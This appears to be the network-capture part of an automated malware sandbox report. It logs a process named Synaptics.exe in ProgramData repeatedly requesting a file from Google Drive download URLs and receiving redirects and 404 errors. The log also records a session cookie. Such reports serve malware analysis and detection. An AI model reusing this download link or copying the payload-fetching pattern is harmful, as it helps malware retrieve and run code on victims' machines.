2024-12-30 10:25:32 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.9 | 49758 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:32 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.9 | 49759 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:32 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.9 | 49761 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:33 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:33 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7O_8nEjWJNdlLNBRnMeU0HqhuwwvBAPvnwCzWY937eobRlfBbBXOk1Adou5ymE5mXY
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-e4Pt5PPV8v-pX8X7T0NJBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:33 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:33 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="SF6CbXfefswcK42tvJvFxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:33 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.9 | 49762 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2024-12-30 10:25:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zFXmvv2q1-wdjcQKxTqjrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.9 | 49764 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2024-12-30 10:25:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-8TOL2EzZPCITdjoSyrNiMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.9 | 49771 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:34 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
2024-12-30 10:25:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-k4-NClUc9PU2HWWnoGZu6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    32 | 192.168.2.9 | 49769 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:34 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-xd4lYfDdcXhFTCgdtYujAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    33 | 192.168.2.9 | 49768 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:34 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:35 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5hhvi7_59EzkaTic7-WNeViVn_GBQ7zNZNPjZi73WniYXacej0UiEaqHiLIAX6O0w6n9YSd-Y
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-qE-R7FGhhX0v1n7xfM2l-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:35 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:35 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="8bWzn8miL7mYfHwVKMWAQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:35 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    34 | 192.168.2.9 | 49770 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:34 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:35 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4pVFpQkvf6F1lnoeKm562fqYMq2R5x1eJ-M76LoHGQOfTsXGH0QqipvmbVMOUWcZMEYGXl1zM
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-oeNJ12oSFSzqqjzP8VnfCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:35 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:35 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="CfhPlWYlLqJLYBLIAARiQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:35 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    35 | 192.168.2.9 | 49773 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-yIQ1KZJpjimmswez3xQ2eA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    36 | 192.168.2.9 | 49772 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dfix2a-6zHWo4jvcwi0UBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    37 | 192.168.2.9 | 49774 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:35 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:36 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5CQOS6CqRfeUnv0GsHroGTZKWMzwvGwSq4i9iUCl5hIt9S9kBNrxNKP0ntknV85b38
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DxIqZbV88PZzPTAOJL9OAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:36 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:36 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="6MTviuEI5Imgm1H1tTuOsQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:36 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.9 | 49776 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
